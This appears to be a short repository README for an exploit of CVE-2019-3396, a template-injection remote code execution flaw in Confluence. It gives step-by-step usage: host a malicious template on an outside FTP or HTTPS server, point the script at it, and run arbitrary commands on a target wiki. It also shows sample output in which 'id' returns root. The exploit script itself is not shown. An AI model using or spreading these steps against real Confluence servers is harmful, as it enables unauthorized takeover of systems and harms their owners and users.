/CVE-2019-3396_EXP

CVE-2019-3396 confluence SSTI RCE

Primary LanguagePython

CVE-2019-3396_EXP

CVE-2019-3396 confluence SSTI RCE

1、put the cmd.vm on your website (must use ftp or https ,http doesn't work )
2、modify RCE_exp.py ,change the filename = 'ftp://1.1.1.1/cmd.vm' (python -m pyftpdlib -p 21)
3、python REC_exp.py http://test.wiki_test.cc:8080 "whoami"

$ python REC_exp.py http://test.wiki_test.cc:8080 "id"
uid=0(root) gid=0(root) groups=0(root)